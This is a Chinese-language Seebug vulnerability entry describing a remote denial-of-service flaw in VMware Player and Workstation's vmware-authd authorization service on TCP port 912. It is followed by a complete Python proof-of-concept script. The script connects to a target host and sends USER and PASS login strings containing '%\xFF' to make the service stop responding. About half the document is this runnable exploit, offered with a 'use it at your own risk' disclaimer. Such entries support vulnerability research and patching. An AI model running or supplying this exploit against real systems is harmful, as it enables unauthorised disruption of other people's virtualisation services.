VMware Player和Workstation 'vmware-authd'远程拒绝服务漏洞

2009-10-09T00:00:00
ID SSV:12441
Type seebug
Reporter Root
Modified 2009-10-09T00:00:00

Description

Bugraq ID: 36630

VMware Player是一款可以让PC用户在Windows或Linux PC上很容易的运行虚拟机的免费软件。VMWare Workstation是一款流行的虚拟机应用程序。 当处理登录请求时VMware授权服务存在错误,通过提交包含 '\xFF'字符的"USER"或"PASS"字符串给监听在TCP 912端口的"vmware-authd"进程,可导致服务停止响应。 根据报告,确认VMware Workstation 6.5.3 build 185404和VMware Player 2.5.3 build 185404中的vmware-authd.exe 6.5.3.8888版本受此漏洞影响。其他版本也可能受此漏洞影响。

VMWare Workstation 6.5.3 build 185404 VMWare Player 2.5.3 build 185404 厂商解决方案:

目前没有详细解决方案提供: http://www.vmware.com/

                                        
                                            
                                                # ----------------------------------------------------------------------------
# VMware Authorization Service <= 2.5.3 (vmware-authd.exe) Format String DoS
# url: http://www.vmware.com/
#
# author: shinnai
# mail: shinnai[at]autistici[dot]org
# site: http://www.shinnai.net
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# Tested on Windows XP Professional Ita SP3 full patched
# ----------------------------------------------------------------------------
# usage: C:\>exploit.py 127.0.0.1 912
import socket
import time
import sys
host = str(sys.argv[1])
port = int(sys.argv[2])
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    conn = s.connect((host, port))
    d = s.recv(1024)
    print "Server <- " + d
    s.send('USER \x25\xFF \r\n')
    print 'Sending command "USER" + evil string...'
    d = s.recv(1024)
    print "Server response <- " + d
    s.send('PASS \x25\xFF \r\n')
    print 'Sending command "PASS" + evil string...'
    try:
        d = s.recv(1024)
        print "Server response <- " + d
    except:
        print "\nExploit completed..."
except:
    print "Something goes wrong honey..."